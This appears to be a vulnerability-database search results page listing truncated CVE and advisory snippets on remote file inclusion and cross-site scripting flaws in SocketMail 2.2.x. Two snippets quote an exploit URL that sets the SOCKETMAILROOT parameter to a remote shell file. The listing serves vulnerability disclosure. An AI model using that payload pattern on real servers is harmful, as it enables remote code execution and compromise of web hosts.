37 matches found
CVE-2007-5627
PHP remote file inclusion vulnerability in content/fnc-readmail3.php in SocketMail 2.2.8 allows remote attackers to execute arbitrary PHP code via a URL in the __SOCKETMAIL_ROOT parameter...
CVE-2007-5627
The set of connected documents confirms CVE-2007-5627 affects SocketMail 2.2.8. The vulnerability is a PHP remote file inclusion in content/fnc-readmail3.php, exploitable via a URL in the __SOCKETMAIL_ROOT parameter, allowing an attacker to execute arbitrary PHP code. This is the stated impact in...
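SocketMail FNC-Readmail3.PHP Remote File Inclusion Vulnerability
SocketMail is a PHP-based web application. SocketMail does not properly filter user-submitted URI data, so a remote attacker can exploit the vulnerability to execute arbitrary commands with the privileges of the web server. The problem is that the 'FNC-Readmail3.PHP' script does not filter the user-submitted 'SOCKETMAILROOT' parameter; specifying an arbitrary file on a remote server as the include target can lead to arbitrary command execution with the privileges of the web server. Creative Digital Resources SocketMail 2.2.8 No solution is currently available: http://www.socketmail.com/site/home/...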
SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability
No description provided by source. Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3.php Exploit URL: http://localhost/mail/content/fnc-readmail3.php?SOCKETMAILROOT=http://localhost/shell.txt? Method: get Registerglobals: On Vulnerable variable: SOCKETMAILROOT...
socketmail-xss.txt
+====================================================================+ + SocketMail =2.2.1 XSS Multiple Remote Vulnerabilities + +====================================================================+ Authors: Ivan Sanchez & Maximiliano Soler. Product: SocketMail. Description: SocketMail is a...
socketmail-rfi.txt
Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3.php Exploit URL: http://localhost/mail/content/fnc-readmail3.php?SOCKETMAILROOT=http://localhost/shell.txt? Method: get Registerglobals: On Vulnerable variable: SOCKETMAILROOT Line number: 399 Lines:...
Socketmail 2.2.1 - 'lostpwd.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/26138/info SocketMail is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user ...
Socketmail 2.2.1 - lostpwd.php Cross-Site Scripting
Socketmail 2.2.1 - lostpwd.php Cross-Site Scripting source: https://www.securityfocus.com/bid/26138/info SocketMail is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary...
CVE-2006-2681
PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when register_globals and magic_quotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) index.php and (2) inc-common.php...
Remote file inclusion
PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when register_globals and magic_quotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) index.php and (2) inc-common.php...
CVE-2006-2681
PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when register_globals and magic_quotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) index.php and (2) inc-common.php...
CVE-2006-2681
CVE-2006-2681 describes a PHP remote file inclusion in SocketMail Lite and Pro 2.2.6 and earlier. When both register_globals and magic_quotes are enabled, an attacker can supply a URL in the site_path parameter to (1) index.php or (2) inc-common.php to execute arbitrary PHP code on the server. Th...
[MajorSecurity #6]Socketmail <= 2.2.6 - Remote File Include Vulnerability
[MajorSecurity #6]Socketmail <= 2.2.6 - Remote File Include Vulnerability -------------------------------------------------------- Software: Socketmail Version: <=2.2.6 Type: Remote File Include Vulnerability Date: May, 25th 2006 Vendor: Creative Digital Resources Page: http://socketmail.com Risc: High...
Socketmail 2.2.6 - site_path Remote File Inclusion
Socketmail 2.2.6 - site_path Remote File Inclusion Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: Creative Digital Resources URL: http://socketmail.com...
Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability
No description provided by source. Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: Creative Digital Resources URL: http://socketmail.com ----------------------------------------------------------------- Credit...
Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ================================================================= Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability ================================================================= Title: Socketmail <= 2.2.6 - Remote File Inclu...
Socketmail 2.2.6 - 'site_path' Remote File Inclusion
Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: Creative Digital Resources URL: http://socketmail.com ----------------------------------------------------------------- Credits: Discovered by: 'Aesthetico'...